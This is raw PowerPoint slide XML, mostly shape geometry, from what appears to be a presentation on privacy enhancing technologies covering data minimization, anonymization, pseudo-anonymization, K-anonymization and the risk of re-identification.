              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="78231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5901944" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0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052320" y="3121913"/>
            <a:ext cx="115697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Collecting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sufficient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perform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specific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task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which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consent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was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obtained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52320" y="2311349"/>
            <a:ext cx="240601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6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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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mi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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2200" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ization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847469" y="4022216"/>
            <a:ext cx="12563475" cy="1569085"/>
            <a:chOff x="1847469" y="4022216"/>
            <a:chExt cx="12563475" cy="1569085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="4501133"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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869186" y="4031741"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="5901944" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5901944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869186" y="4031741"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="78231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5901944" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0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2052320" y="4845558"/>
            <a:ext cx="708850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Removing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personal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information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from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shared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sets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34972" y="4089908"/>
            <a:ext cx="217614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3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570">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>identif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55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ca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ion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847469" y="5779389"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="5779389"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="6256782"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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869186" y="5788914"/>
              <a:ext cx="5980430" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="467995">
                  <a:moveTo>
                    <a:pt x="5902197" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974046" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957331" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932545" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5902197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869186" y="5788914"/>
              <a:ext cx="5980430" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="467995">
                  <a:moveTo>
                    <a:pt x="77977" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5902197" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932545" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957331" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974046" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0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2052320" y="6584695"/>
            <a:ext cx="68199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Referring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irreversible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de-identification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techniques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052320" y="5823965"/>
            <a:ext cx="197802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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Anonymization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881117" y="1398777"/>
            <a:ext cx="695579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70">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>enhancing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-80">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>technologies</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>include: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3011" y="306451"/>
            <a:ext cx="56495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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enhancing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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Technologies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19015" y="731519"/>
            <a:ext cx="7740396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847469" y="4961001"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="4961001"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="5438394"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88772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869186" y="4970526"/>
              <a:ext cx="5980430" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="467995">
                  <a:moveTo>
                    <a:pt x="5902197" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974046" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957331" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932545" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5902197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869186" y="4970526"/>
              <a:ext cx="5980430" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="467995">
                  <a:moveTo>
                    <a:pt x="77977" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5902197" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932545" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957331" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974046" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0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052320" y="5764529"/>
            <a:ext cx="849820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Significant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risk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re-identification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possible,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given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value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K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73579" y="4985003"/>
            <a:ext cx="5087620" cy="431800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5087620" h="431800">
                <a:moveTo>
                  <a:pt x="5087112" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="431291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5087112" y="431291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5087112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052320" y="5004892"/>
            <a:ext cx="314642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1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570">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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95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55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>entif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ca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ion</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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at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75">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>acks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847469" y="2739008"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="2739008"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="3216401"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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869186" y="2748533"/>
              <a:ext cx="5980430" cy="447040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="447039">
                  <a:moveTo>
                    <a:pt x="5905754" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74421" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45434" y="5841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21780" y="21780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5842" y="45434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="74421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="446531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="446531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="74421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974334" y="45434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5958395" y="21780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5934741" y="5841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5905754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869186" y="2748533"/>
              <a:ext cx="5980430" cy="447040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="447039">
                  <a:moveTo>
                    <a:pt x="74421" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5905754" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5934741" y="5841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5958395" y="21780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974334" y="45434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="74421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="446531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="446531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="74421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5842" y="45434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21780" y="21780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45434" y="5841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="0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2052320" y="2783204"/>
            <a:ext cx="7400925" cy="10972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70">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Pseudo-Anonymization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Re-identification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possible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using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separate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source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8964" y="306451"/>
            <a:ext cx="64185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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De-identification</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="190">
                <a:solidFill>
